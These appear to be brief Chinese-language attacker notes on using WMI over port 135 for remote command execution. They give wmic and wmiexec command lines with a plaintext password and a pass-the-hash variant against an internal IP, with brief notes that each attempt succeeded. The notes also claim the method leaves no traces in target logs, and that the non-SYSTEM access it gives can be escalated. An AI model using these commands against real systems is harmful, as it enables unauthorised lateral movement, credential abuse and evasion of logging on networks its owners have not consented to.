wim是通过135端口进行利用的,支持明文和hash的方式进行认证,并且不会在目标系统日志下留下痕迹
VMIC(明文传递,官方自带,无回显)
wmic /node:192.168.52.129 /user:liukaifeng01 /password:P@ssw0rd process call create "cmd.exe /c ipconfig >C:\1.txt"
把ipconfig 执行后内容输入到对方c盘的1.txt
成功
cscript(明文传递,官方自带,有回显)
这个需要wmiexec.vbs这个配合使用
vmiexec(支持hash,有回显,第三方)
明文
wmiexec ./用户名:密码@对方ip "whoami"
成功一半,返回权限不是system 。但可以提权
hash
wmiexec -hashes 值 ./用户@对方ip "whoami"